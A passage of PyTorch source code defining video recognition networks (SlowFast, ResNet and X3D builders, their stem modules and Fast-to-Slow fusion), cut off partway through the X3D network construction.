self.add_module('pathway{}_nonlocal{}'.format(pathway, i), nln)
def forward(self, inputs):
output = []
for pathway in range(self.num_pathways):
x = inputs[pathway]
for i in range(self.num_blocks[pathway]):
m = getattr(self, 'pathway{}_res{}'.format(pathway, i))
x = m(x)
if hasattr(self, 'pathway{}_nonlocal{}'.format(pathway, i)):
nln = getattr(self, 'pathway{}_nonlocal{}'.format(pathway, i))
b, c, t, h, w = x.shape
if self.nonlocal_group[pathway] > 1:
x = x.permute(0, 2, 1, 3, 4)
x = x.reshape(b * self.nonlocal_group[pathway], t // self.nonlocal_group[pathway], c, h, w)
x = x.permute(0, 2, 1, 3, 4)
x = nln(x)
if self.nonlocal_group[pathway] > 1:
x = x.permute(0, 2, 1, 3, 4)
x = x.reshape(b, t, c, h, w)
x = x.permute(0, 2, 1, 3, 4)
output.append(x)
return output
class ResNetBasicStem(nn.Module):
"""
ResNe(X)t 3D stem module.
Performs spatiotemporal Convolution, BN, and Relu following by a
spatiotemporal pooling.
"""
def __init__(self, dim_in, dim_out, kernel, stride, padding, inplace_relu=True, eps=1e-05, bn_mmt=0.1, norm_module=nn.BatchNorm3d):
"""
The `__init__` method of any subclass should also contain these arguments.
Args:
dim_in (int): the channel dimension of the input. Normally 3 is used
for rgb input, and 2 or 3 is used for optical flow input.
dim_out (int): the output dimension of the convolution in the stem
layer.
kernel (list): the kernel size of the convolution in the stem layer.
temporal kernel size, height kernel size, width kernel size in
order.
stride (list): the stride size of the convolution in the stem layer.
temporal kernel stride, height kernel size, width kernel size in
order.
padding (int): the padding size of the convolution in the stem
layer, temporal padding size, height padding size, width
padding size in order.
inplace_relu (bool): calculate the relu on the original input
without allocating new memory.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
"""
super(ResNetBasicStem, self).__init__()
self.kernel = kernel
self.stride = stride
self.padding = padding
self.inplace_relu = inplace_relu
self.eps = eps
self.bn_mmt = bn_mmt
self._construct_stem(dim_in, dim_out, norm_module)
def _construct_stem(self, dim_in, dim_out, norm_module):
self.conv = nn.Conv3d(dim_in, dim_out, self.kernel, stride=self.stride, padding=self.padding, bias=False)
self.bn = norm_module(num_features=dim_out, eps=self.eps, momentum=self.bn_mmt)
self.relu = nn.ReLU(self.inplace_relu)
self.pool_layer = nn.MaxPool3d(kernel_size=[1, 3, 3], stride=[1, 2, 2], padding=[0, 1, 1])
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.relu(x)
x = self.pool_layer(x)
return x
class X3DStem(nn.Module):
"""
X3D's 3D stem module.
Performs a spatial followed by a depthwise temporal Convolution, BN, and Relu following by a
spatiotemporal pooling.
"""
def __init__(self, dim_in, dim_out, kernel, stride, padding, inplace_relu=True, eps=1e-05, bn_mmt=0.1, norm_module=nn.BatchNorm3d):
"""
The `__init__` method of any subclass should also contain these arguments.
Args:
dim_in (int): the channel dimension of the input. Normally 3 is used
for rgb input, and 2 or 3 is used for optical flow input.
dim_out (int): the output dimension of the convolution in the stem
layer.
kernel (list): the kernel size of the convolution in the stem layer.
temporal kernel size, height kernel size, width kernel size in
order.
stride (list): the stride size of the convolution in the stem layer.
temporal kernel stride, height kernel size, width kernel size in
order.
padding (int): the padding size of the convolution in the stem
layer, temporal padding size, height padding size, width
padding size in order.
inplace_relu (bool): calculate the relu on the original input
without allocating new memory.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
"""
super(X3DStem, self).__init__()
self.kernel = kernel
self.stride = stride
self.padding = padding
self.inplace_relu = inplace_relu
self.eps = eps
self.bn_mmt = bn_mmt
self._construct_stem(dim_in, dim_out, norm_module)
def _construct_stem(self, dim_in, dim_out, norm_module):
self.conv_xy = nn.Conv3d(dim_in, dim_out, kernel_size=(1, self.kernel[1], self.kernel[2]), stride=(1, self.stride[1], self.stride[2]), padding=(0, self.padding[1], self.padding[2]), bias=False)
self.conv = nn.Conv3d(dim_out, dim_out, kernel_size=(self.kernel[0], 1, 1), stride=(self.stride[0], 1, 1), padding=(self.padding[0], 0, 0), bias=False, groups=dim_out)
self.bn = norm_module(num_features=dim_out, eps=self.eps, momentum=self.bn_mmt)
self.relu = nn.ReLU(self.inplace_relu)
def forward(self, x):
x = self.conv_xy(x)
x = self.conv(x)
x = self.bn(x)
x = self.relu(x)
return x
def get_stem_func(name):
"""
Retrieves the stem module by name.
"""
trans_funcs = {'x3d_stem': X3DStem, 'basic_stem': ResNetBasicStem}
assert name in trans_funcs.keys(), "Transformation function '{}' not supported".format(name)
return trans_funcs[name]
class VideoModelStem(nn.Module):
"""
Video 3D stem module. Provides stem operations of Conv, BN, ReLU, MaxPool
on input data tensor for one or multiple pathways.
"""
def __init__(self, dim_in, dim_out, kernel, stride, padding, inplace_relu=True, eps=1e-05, bn_mmt=0.1, norm_module=nn.BatchNorm3d, stem_func_name='basic_stem'):
"""
The `__init__` method of any subclass should also contain these
arguments. List size of 1 for single pathway models (C2D, I3D, Slow
and etc), list size of 2 for two pathway models (SlowFast).
Args:
dim_in (list): the list of channel dimensions of the inputs.
dim_out (list): the output dimension of the convolution in the stem
layer.
kernel (list): the kernels' size of the convolutions in the stem
layers. Temporal kernel size, height kernel size, width kernel
size in order.
stride (list): the stride sizes of the convolutions in the stem
layer. Temporal kernel stride, height kernel size, width kernel
size in order.
padding (list): the paddings' sizes of the convolutions in the stem
layer. Temporal padding size, height padding size, width padding
size in order.
inplace_relu (bool): calculate the relu on the original input
without allocating new memory.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
stem_func_name (string): name of the the stem function applied on
input to the network.
"""
super(VideoModelStem, self).__init__()
assert len({len(dim_in), len(dim_out), len(kernel), len(stride), len(padding)}) == 1, 'Input pathway dimensions are not consistent.'
self.num_pathways = len(dim_in)
self.kernel = kernel
self.stride = stride
self.padding = padding
self.inplace_relu = inplace_relu
self.eps = eps
self.bn_mmt = bn_mmt
self._construct_stem(dim_in, dim_out, norm_module, stem_func_name)
def _construct_stem(self, dim_in, dim_out, norm_module, stem_func_name):
trans_func = get_stem_func(stem_func_name)
for pathway in range(len(dim_in)):
stem = trans_func(dim_in[pathway], dim_out[pathway], self.kernel[pathway], self.stride[pathway], self.padding[pathway], self.inplace_relu, self.eps, self.bn_mmt, norm_module)
self.add_module('pathway{}_stem'.format(pathway), stem)
def forward(self, x):
assert len(x) == self.num_pathways, 'Input tensor does not contain {} pathway'.format(self.num_pathways)
for pathway in range(len(x)):
m = getattr(self, 'pathway{}_stem'.format(pathway))
x[pathway] = m(x[pathway])
return x
class FuseFastToSlow(nn.Module):
"""
Fuses the information from the Fast pathway to the Slow pathway. Given the
tensors from Slow pathway and Fast pathway, fuse information from Fast to
Slow, then return the fused tensors from Slow and Fast pathway in order.
"""
def __init__(self, dim_in, fusion_conv_channel_ratio, fusion_kernel, alpha, eps=1e-05, bn_mmt=0.1, inplace_relu=True, norm_module=nn.BatchNorm3d):
"""
Args:
dim_in (int): the channel dimension of the input.
fusion_conv_channel_ratio (int): channel ratio for the convolution
used to fuse from Fast pathway to Slow pathway.
fusion_kernel (int): kernel size of the convolution used to fuse
from Fast pathway to Slow pathway.
alpha (int): the frame rate ratio between the Fast and Slow pathway.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
inplace_relu (bool): if True, calculate the relu on the original
input without allocating new memory.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
"""
super(FuseFastToSlow, self).__init__()
self.conv_f2s = nn.Conv3d(dim_in, dim_in * fusion_conv_channel_ratio, kernel_size=[fusion_kernel, 1, 1], stride=[alpha, 1, 1], padding=[fusion_kernel // 2, 0, 0], bias=False)
self.bn = norm_module(num_features=dim_in * fusion_conv_channel_ratio, eps=eps, momentum=bn_mmt)
self.relu = nn.ReLU(inplace_relu)
def forward(self, x):
x_s = x[0]
x_f = x[1]
fuse = self.conv_f2s(x_f)
fuse = self.bn(fuse)
fuse = self.relu(fuse)
x_s_fuse = torch.cat([x_s, fuse], 1)
return [x_s_fuse, x_f]
_MODEL_STAGE_DEPTH = {(50): (3, 4, 6, 3), (101): (3, 4, 23, 3)}
_POOL1 = {'c2d': [[2, 1, 1]], 'c2d_nopool': [[1, 1, 1]], 'i3d': [[2, 1, 1]], 'i3d_nopool': [[1, 1, 1]], 'slow': [[1, 1, 1]], 'slowfast': [[1, 1, 1], [1, 1, 1]], 'x3d': [[1, 1, 1]]}
_TEMPORAL_KERNEL_BASIS = {'c2d': [[[1]], [[1]], [[1]], [[1]], [[1]]], 'c2d_nopool': [[[1]], [[1]], [[1]], [[1]], [[1]]], 'i3d': [[[5]], [[3]], [[3, 1]], [[3, 1]], [[1, 3]]], 'i3d_nopool': [[[5]], [[3]], [[3, 1]], [[3, 1]], [[1, 3]]], 'slow': [[[1]], [[1]], [[1]], [[3]], [[3]]], 'slowfast': [[[1], [5]], [[1], [3]], [[1], [3]], [[3], [3]], [[3], [3]]], 'x3d': [[[5]], [[3]], [[3]], [[3]], [[3]]]}
def get_norm(cfg):
"""
Args:
cfg (CfgNode): model building configs, details are in the comments of
the config file.
Returns:
nn.Module: the normalization layer.
"""
if cfg.BN.NORM_TYPE == 'batchnorm':
return nn.BatchNorm3d
elif cfg.BN.NORM_TYPE == 'sub_batchnorm':
return partial(SubBatchNorm3d, num_splits=cfg.BN.NUM_SPLITS)
elif cfg.BN.NORM_TYPE == 'sync_batchnorm':
return partial(NaiveSyncBatchNorm3d, num_sync_devices=cfg.BN.NUM_SYNC_DEVICES)
else:
raise NotImplementedError('Norm type {} is not supported'.format(cfg.BN.NORM_TYPE))
class SlowFast(nn.Module):
"""
SlowFast model builder for SlowFast network.
Christoph Feichtenhofer, Haoqi Fan, Jitendra Malik, and Kaiming He.
"SlowFast networks for video recognition."
https://arxiv.org/pdf/1812.03982.pdf
"""
def __init__(self, cfg):
"""
The `__init__` method of any subclass should also contain these
arguments.
Args:
cfg (CfgNode): model building configs, details are in the
comments of the config file.
"""
super(SlowFast, self).__init__()
self.norm_module = get_norm(cfg)
self.enable_detection = cfg.DETECTION.ENABLE
self.num_pathways = 2
self._construct_network(cfg)
init_helper.init_weights(self, cfg.MODEL.FC_INIT_STD, cfg.RESNET.ZERO_INIT_FINAL_BN)
def _construct_network(self, cfg):
"""
Builds a SlowFast model. The first pathway is the Slow pathway and the
second pathway is the Fast pathway.
Args:
cfg (CfgNode): model building configs, details are in the
comments of the config file.
"""
assert cfg.MODEL.ARCH in _POOL1.keys()
pool_size = _POOL1[cfg.MODEL.ARCH]
assert len({len(pool_size), self.num_pathways}) == 1
assert cfg.RESNET.DEPTH in _MODEL_STAGE_DEPTH.keys()
d2, d3, d4, d5 = _MODEL_STAGE_DEPTH[cfg.RESNET.DEPTH]
num_groups = cfg.RESNET.NUM_GROUPS
width_per_group = cfg.RESNET.WIDTH_PER_GROUP
dim_inner = num_groups * width_per_group
out_dim_ratio = cfg.SLOWFAST.BETA_INV // cfg.SLOWFAST.FUSION_CONV_CHANNEL_RATIO
temp_kernel = _TEMPORAL_KERNEL_BASIS[cfg.MODEL.ARCH]
self.s1 = stem_helper.VideoModelStem(dim_in=cfg.DATA.INPUT_CHANNEL_NUM, dim_out=[width_per_group, width_per_group // cfg.SLOWFAST.BETA_INV], kernel=[temp_kernel[0][0] + [7, 7], temp_kernel[0][1] + [7, 7]], stride=[[1, 2, 2]] * 2, padding=[[temp_kernel[0][0][0] // 2, 3, 3], [temp_kernel[0][1][0] // 2, 3, 3]], norm_module=self.norm_module)
self.s1_fuse = FuseFastToSlow(width_per_group // cfg.SLOWFAST.BETA_INV, cfg.SLOWFAST.FUSION_CONV_CHANNEL_RATIO, cfg.SLOWFAST.FUSION_KERNEL_SZ, cfg.SLOWFAST.ALPHA, norm_module=self.norm_module)
self.s2 = resnet_helper.ResStage(dim_in=[width_per_group + width_per_group // out_dim_ratio, width_per_group // cfg.SLOWFAST.BETA_INV], dim_out=[width_per_group * 4, width_per_group * 4 // cfg.SLOWFAST.BETA_INV], dim_inner=[dim_inner, dim_inner // cfg.SLOWFAST.BETA_INV], temp_kernel_sizes=temp_kernel[1], stride=cfg.RESNET.SPATIAL_STRIDES[0], num_blocks=[d2] * 2, num_groups=[num_groups] * 2, num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[0], nonlocal_inds=cfg.NONLOCAL.LOCATION[0], nonlocal_group=cfg.NONLOCAL.GROUP[0], nonlocal_pool=cfg.NONLOCAL.POOL[0], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, dilation=cfg.RESNET.SPATIAL_DILATIONS[0], norm_module=self.norm_module)
self.s2_fuse = FuseFastToSlow(width_per_group * 4 // cfg.SLOWFAST.BETA_INV, cfg.SLOWFAST.FUSION_CONV_CHANNEL_RATIO, cfg.SLOWFAST.FUSION_KERNEL_SZ, cfg.SLOWFAST.ALPHA, norm_module=self.norm_module)
for pathway in range(self.num_pathways):
pool = nn.MaxPool3d(kernel_size=pool_size[pathway], stride=pool_size[pathway], padding=[0, 0, 0])
self.add_module('pathway{}_pool'.format(pathway), pool)
self.s3 = resnet_helper.ResStage(dim_in=[width_per_group * 4 + width_per_group * 4 // out_dim_ratio, width_per_group * 4 // cfg.SLOWFAST.BETA_INV], dim_out=[width_per_group * 8, width_per_group * 8 // cfg.SLOWFAST.BETA_INV], dim_inner=[dim_inner * 2, dim_inner * 2 // cfg.SLOWFAST.BETA_INV], temp_kernel_sizes=temp_kernel[2], stride=cfg.RESNET.SPATIAL_STRIDES[1], num_blocks=[d3] * 2, num_groups=[num_groups] * 2, num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[1], nonlocal_inds=cfg.NONLOCAL.LOCATION[1], nonlocal_group=cfg.NONLOCAL.GROUP[1], nonlocal_pool=cfg.NONLOCAL.POOL[1], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, dilation=cfg.RESNET.SPATIAL_DILATIONS[1], norm_module=self.norm_module)
self.s3_fuse = FuseFastToSlow(width_per_group * 8 // cfg.SLOWFAST.BETA_INV, cfg.SLOWFAST.FUSION_CONV_CHANNEL_RATIO, cfg.SLOWFAST.FUSION_KERNEL_SZ, cfg.SLOWFAST.ALPHA, norm_module=self.norm_module)
self.s4 = resnet_helper.ResStage(dim_in=[width_per_group * 8 + width_per_group * 8 // out_dim_ratio, width_per_group * 8 // cfg.SLOWFAST.BETA_INV], dim_out=[width_per_group * 16, width_per_group * 16 // cfg.SLOWFAST.BETA_INV], dim_inner=[dim_inner * 4, dim_inner * 4 // cfg.SLOWFAST.BETA_INV], temp_kernel_sizes=temp_kernel[3], stride=cfg.RESNET.SPATIAL_STRIDES[2], num_blocks=[d4] * 2, num_groups=[num_groups] * 2, num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[2], nonlocal_inds=cfg.NONLOCAL.LOCATION[2], nonlocal_group=cfg.NONLOCAL.GROUP[2], nonlocal_pool=cfg.NONLOCAL.POOL[2], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, dilation=cfg.RESNET.SPATIAL_DILATIONS[2], norm_module=self.norm_module)
self.s4_fuse = FuseFastToSlow(width_per_group * 16 // cfg.SLOWFAST.BETA_INV, cfg.SLOWFAST.FUSION_CONV_CHANNEL_RATIO, cfg.SLOWFAST.FUSION_KERNEL_SZ, cfg.SLOWFAST.ALPHA, norm_module=self.norm_module)
self.s5 = resnet_helper.ResStage(dim_in=[width_per_group * 16 + width_per_group * 16 // out_dim_ratio, width_per_group * 16 // cfg.SLOWFAST.BETA_INV], dim_out=[width_per_group * 32, width_per_group * 32 // cfg.SLOWFAST.BETA_INV], dim_inner=[dim_inner * 8, dim_inner * 8 // cfg.SLOWFAST.BETA_INV], temp_kernel_sizes=temp_kernel[4], stride=cfg.RESNET.SPATIAL_STRIDES[3], num_blocks=[d5] * 2, num_groups=[num_groups] * 2, num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[3], nonlocal_inds=cfg.NONLOCAL.LOCATION[3], nonlocal_group=cfg.NONLOCAL.GROUP[3], nonlocal_pool=cfg.NONLOCAL.POOL[3], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, dilation=cfg.RESNET.SPATIAL_DILATIONS[3], norm_module=self.norm_module)
if cfg.DETECTION.ENABLE:
self.head = head_helper.ResNetRoIHead(dim_in=[width_per_group * 32, width_per_group * 32 // cfg.SLOWFAST.BETA_INV], num_classes=cfg.MODEL.NUM_CLASSES, pool_size=[[cfg.DATA.NUM_FRAMES // cfg.SLOWFAST.ALPHA // pool_size[0][0], 1, 1], [cfg.DATA.NUM_FRAMES // pool_size[1][0], 1, 1]], resolution=[[cfg.DETECTION.ROI_XFORM_RESOLUTION] * 2] * 2, scale_factor=[cfg.DETECTION.SPATIAL_SCALE_FACTOR] * 2, dropout_rate=cfg.MODEL.DROPOUT_RATE, act_func=cfg.MODEL.HEAD_ACT, aligned=cfg.DETECTION.ALIGNED)
else:
head = head_helper.ResNetBasicHead(dim_in=[width_per_group * 32, width_per_group * 32 // cfg.SLOWFAST.BETA_INV], num_classes=cfg.MODEL.NUM_CLASSES, pool_size=[None, None] if cfg.MULTIGRID.SHORT_CYCLE else [[cfg.DATA.NUM_FRAMES // cfg.SLOWFAST.ALPHA // pool_size[0][0], cfg.DATA.TRAIN_CROP_SIZE // 32 // pool_size[0][1], cfg.DATA.TRAIN_CROP_SIZE // 32 // pool_size[0][2]], [cfg.DATA.NUM_FRAMES // pool_size[1][0], cfg.DATA.TRAIN_CROP_SIZE // 32 // pool_size[1][1], cfg.DATA.TRAIN_CROP_SIZE // 32 // pool_size[1][2]]], dropout_rate=cfg.MODEL.DROPOUT_RATE, act_func=cfg.MODEL.HEAD_ACT)
self.head_name = 'head{}'.format(cfg.TASK)
self.add_module(self.head_name, head)
def forward(self, x, bboxes=None):
x = self.s1(x)
x = self.s1_fuse(x)
x = self.s2(x)
x = self.s2_fuse(x)
for pathway in range(self.num_pathways):
pool = getattr(self, 'pathway{}_pool'.format(pathway))
x[pathway] = pool(x[pathway])
x = self.s3(x)
x = self.s3_fuse(x)
x = self.s4(x)
x = self.s4_fuse(x)
x = self.s5(x)
head = getattr(self, self.head_name)
if self.enable_detection:
x = head(x, bboxes)
else:
x = head(x)
return x
class ResNet(nn.Module):
"""
ResNet model builder. It builds a ResNet like network backbone without
lateral connection (C2D, I3D, Slow).
Christoph Feichtenhofer, Haoqi Fan, Jitendra Malik, and Kaiming He.
"SlowFast networks for video recognition."
https://arxiv.org/pdf/1812.03982.pdf
Xiaolong Wang, Ross Girshick, Abhinav Gupta, and Kaiming He.
"Non-local neural networks."
https://arxiv.org/pdf/1711.07971.pdf
"""
def __init__(self, cfg):
"""
The `__init__` method of any subclass should also contain these
arguments.
Args:
cfg (CfgNode): model building configs, details are in the
comments of the config file.
"""
super(ResNet, self).__init__()
self.norm_module = get_norm(cfg)
self.enable_detection = cfg.DETECTION.ENABLE
self.num_pathways = 1
self._construct_network(cfg)
init_helper.init_weights(self, cfg.MODEL.FC_INIT_STD, cfg.RESNET.ZERO_INIT_FINAL_BN)
def _construct_network(self, cfg):
"""
Builds a single pathway ResNet model.
Args:
cfg (CfgNode): model building configs, details are in the
comments of the config file.
"""
assert cfg.MODEL.ARCH in _POOL1.keys()
pool_size = _POOL1[cfg.MODEL.ARCH]
assert len({len(pool_size), self.num_pathways}) == 1
assert cfg.RESNET.DEPTH in _MODEL_STAGE_DEPTH.keys()
d2, d3, d4, d5 = _MODEL_STAGE_DEPTH[cfg.RESNET.DEPTH]
num_groups = cfg.RESNET.NUM_GROUPS
width_per_group = cfg.RESNET.WIDTH_PER_GROUP
dim_inner = num_groups * width_per_group
temp_kernel = _TEMPORAL_KERNEL_BASIS[cfg.MODEL.ARCH]
self.s1 = stem_helper.VideoModelStem(dim_in=cfg.DATA.INPUT_CHANNEL_NUM, dim_out=[width_per_group], kernel=[temp_kernel[0][0] + [7, 7]], stride=[[1, 2, 2]], padding=[[temp_kernel[0][0][0] // 2, 3, 3]], norm_module=self.norm_module)
self.s2 = resnet_helper.ResStage(dim_in=[width_per_group], dim_out=[width_per_group * 4], dim_inner=[dim_inner], temp_kernel_sizes=temp_kernel[1], stride=cfg.RESNET.SPATIAL_STRIDES[0], num_blocks=[d2], num_groups=[num_groups], num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[0], nonlocal_inds=cfg.NONLOCAL.LOCATION[0], nonlocal_group=cfg.NONLOCAL.GROUP[0], nonlocal_pool=cfg.NONLOCAL.POOL[0], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, stride_1x1=cfg.RESNET.STRIDE_1X1, inplace_relu=cfg.RESNET.INPLACE_RELU, dilation=cfg.RESNET.SPATIAL_DILATIONS[0], norm_module=self.norm_module)
for pathway in range(self.num_pathways):
pool = nn.MaxPool3d(kernel_size=pool_size[pathway], stride=pool_size[pathway], padding=[0, 0, 0])
self.add_module('pathway{}_pool'.format(pathway), pool)
self.s3 = resnet_helper.ResStage(dim_in=[width_per_group * 4], dim_out=[width_per_group * 8], dim_inner=[dim_inner * 2], temp_kernel_sizes=temp_kernel[2], stride=cfg.RESNET.SPATIAL_STRIDES[1], num_blocks=[d3], num_groups=[num_groups], num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[1], nonlocal_inds=cfg.NONLOCAL.LOCATION[1], nonlocal_group=cfg.NONLOCAL.GROUP[1], nonlocal_pool=cfg.NONLOCAL.POOL[1], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, stride_1x1=cfg.RESNET.STRIDE_1X1, inplace_relu=cfg.RESNET.INPLACE_RELU, dilation=cfg.RESNET.SPATIAL_DILATIONS[1], norm_module=self.norm_module)
self.s4 = resnet_helper.ResStage(dim_in=[width_per_group * 8], dim_out=[width_per_group * 16], dim_inner=[dim_inner * 4], temp_kernel_sizes=temp_kernel[3], stride=cfg.RESNET.SPATIAL_STRIDES[2], num_blocks=[d4], num_groups=[num_groups], num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[2], nonlocal_inds=cfg.NONLOCAL.LOCATION[2], nonlocal_group=cfg.NONLOCAL.GROUP[2], nonlocal_pool=cfg.NONLOCAL.POOL[2], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, stride_1x1=cfg.RESNET.STRIDE_1X1, inplace_relu=cfg.RESNET.INPLACE_RELU, dilation=cfg.RESNET.SPATIAL_DILATIONS[2], norm_module=self.norm_module)
self.s5 = resnet_helper.ResStage(dim_in=[width_per_group * 16], dim_out=[width_per_group * 32], dim_inner=[dim_inner * 8], temp_kernel_sizes=temp_kernel[4], stride=cfg.RESNET.SPATIAL_STRIDES[3], num_blocks=[d5], num_groups=[num_groups], num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[3], nonlocal_inds=cfg.NONLOCAL.LOCATION[3], nonlocal_group=cfg.NONLOCAL.GROUP[3], nonlocal_pool=cfg.NONLOCAL.POOL[3], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, stride_1x1=cfg.RESNET.STRIDE_1X1, inplace_relu=cfg.RESNET.INPLACE_RELU, dilation=cfg.RESNET.SPATIAL_DILATIONS[3], norm_module=self.norm_module)
if self.enable_detection:
self.head = head_helper.ResNetRoIHead(dim_in=[width_per_group * 32], num_classes=cfg.MODEL.NUM_CLASSES, pool_size=[[cfg.DATA.NUM_FRAMES // pool_size[0][0], 1, 1]], resolution=[[cfg.DETECTION.ROI_XFORM_RESOLUTION] * 2], scale_factor=[cfg.DETECTION.SPATIAL_SCALE_FACTOR], dropout_rate=cfg.MODEL.DROPOUT_RATE, act_func=cfg.MODEL.HEAD_ACT, aligned=cfg.DETECTION.ALIGNED)
else:
head = head_helper.ResNetBasicHead(dim_in=[width_per_group * 32], num_classes=cfg.MODEL.NUM_CLASSES, pool_size=[None, None] if cfg.MULTIGRID.SHORT_CYCLE else [[cfg.DATA.NUM_FRAMES // pool_size[0][0], cfg.DATA.TRAIN_CROP_SIZE // 32 // pool_size[0][1], cfg.DATA.TRAIN_CROP_SIZE // 32 // pool_size[0][2]]], dropout_rate=cfg.MODEL.DROPOUT_RATE, act_func=cfg.MODEL.HEAD_ACT)
self.head_name = 'head{}'.format(cfg.TASK)
self.add_module(self.head_name, head)
def forward(self, x, bboxes=None):
x = self.s1(x)
x = self.s2(x)
for pathway in range(self.num_pathways):
pool = getattr(self, 'pathway{}_pool'.format(pathway))
x[pathway] = pool(x[pathway])
x = self.s3(x)
x = self.s4(x)
x = self.s5(x)
head = getattr(self, self.head_name)
if self.enable_detection:
x = head(x, bboxes)
else:
x = head(x)
return x
class X3D(nn.Module):
"""
X3D model builder. It builds a X3D network backbone, which is a ResNet.
Christoph Feichtenhofer.
"X3D: Expanding Architectures for Efficient Video Recognition."
https://arxiv.org/abs/2004.04730
"""
def __init__(self, cfg):
"""
The `__init__` method of any subclass should also contain these
arguments.
Args:
cfg (CfgNode): model building configs, details are in the
comments of the config file.
"""
super(X3D, self).__init__()
self.norm_module = get_norm(cfg)
self.enable_detection = cfg.DETECTION.ENABLE
self.num_pathways = 1
exp_stage = 2.0
self.dim_c1 = cfg.X3D.DIM_C1
self.dim_res2 = self._round_width(self.dim_c1, exp_stage, divisor=8) if cfg.X3D.SCALE_RES2 else self.dim_c1
self.dim_res3 = self._round_width(self.dim_res2, exp_stage, divisor=8)
self.dim_res4 = self._round_width(self.dim_res3, exp_stage, divisor=8)
self.dim_res5 = self._round_width(self.dim_res4, exp_stage, divisor=8)
self.block_basis = [[1, self.dim_res2, 2], [2, self.dim_res3, 2], [5, self.dim_res4, 2], [3, self.dim_res5, 2]]
self._construct_network(cfg)
init_helper.init_weights(self, cfg.MODEL.FC_INIT_STD, cfg.RESNET.ZERO_INIT_FINAL_BN)
def _round_width(self, width, multiplier, min_depth=8, divisor=8):
"""Round width of filters based on width multiplier."""
if not multiplier:
return width
width *= multiplier
min_depth = min_depth or divisor
new_filters = max(min_depth, int(width + divisor / 2) // divisor * divisor)
if new_filters < 0.9 * width:
new_filters += divisor
return int(new_filters)
def _round_repeats(self, repeats, multiplier):
"""Round number of layers based on depth multiplier."""
multiplier = multiplier
if not multiplier:
return repeats
return int(math.ceil(multiplier * repeats))
def _construct_network(self, cfg):
"""
Builds a single pathway X3D model.
Args:
cfg (CfgNode): model building configs, details are in the
comments of the config file.
"""
assert cfg.MODEL.ARCH in _POOL1.keys()
assert cfg.RESNET.DEPTH in _MODEL_STAGE_DEPTH.keys()
d2, d3, d4, d5 = _MODEL_STAGE_DEPTH[cfg.RESNET.DEPTH]
num_groups = cfg.RESNET.NUM_GROUPS
width_per_group = cfg.RESNET.WIDTH_PER_GROUP
dim_inner = num_groups * width_per_group
w_mul = cfg.X3D.WIDTH_FACTOR
d_mul = cfg.X3D.DEPTH_FACTOR
dim_res1 = self._round_width(self.dim_c1, w_mul)
temp_kernel = _TEMPORAL_KERNEL_BASIS[cfg.MODEL.ARCH]
self.s1 = stem_helper.VideoModelStem(dim_in=cfg.DATA.INPUT_CHANNEL_NUM, dim_out=[dim_res1], kernel=[temp_kernel[0][0] + [3, 3]], stride=[[1, 2, 2]], padding=[[temp_kernel[0][0][0] // 2, 1, 1]], norm_module=self.norm_module, stem_func_name='x3d_stem')
dim_in = dim_res1
for stage, block in enumerate(self.block_basis):
dim_out = self._round_width(block[1], w_mul)
dim_inner = int(cfg.X3D.BOTTLENECK_FACTOR * dim_out)
n_rep = self._round_repeats(block[0], d_mul)
prefix = 's{}'.format(stage + 2)
s = resnet_helper.ResStage(dim_in=[dim_in], dim_out=[dim_out], dim_inner=[dim_inner], temp_kernel_sizes=temp_kernel[1], stride=[block[2]], num_blocks=[n_rep], num_groups=[dim_inner] if cfg.X3D.CHANNELWISE_3x3x3 else [num_groups], num_block_temp_kernel=[n_rep], nonlocal_inds=cfg.NONLOCAL.LOCATION[0], nonlocal_group=cfg.NONLOCAL.GROUP[0], nonlocal_pool=cfg.NONLOCAL.POOL[0], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, stride_1x1=cfg.RESNET.STRIDE_1X1, norm_module=self.norm_module, dilation=cfg.RESNET.SPATIAL_DILATIONS[stage], drop_connect_rate=cfg.MODEL.DROPCONNECT_RATE * (stage + 2) / (len(self.block_basis) + 1))
dim_in = dim_out
self.add_module(prefix, s)
if self.enable_detection:
NotImplementedError
else:
spat_sz = int(math.ceil(cfg.DATA.TRAIN_CROP_SIZE / 32.0))
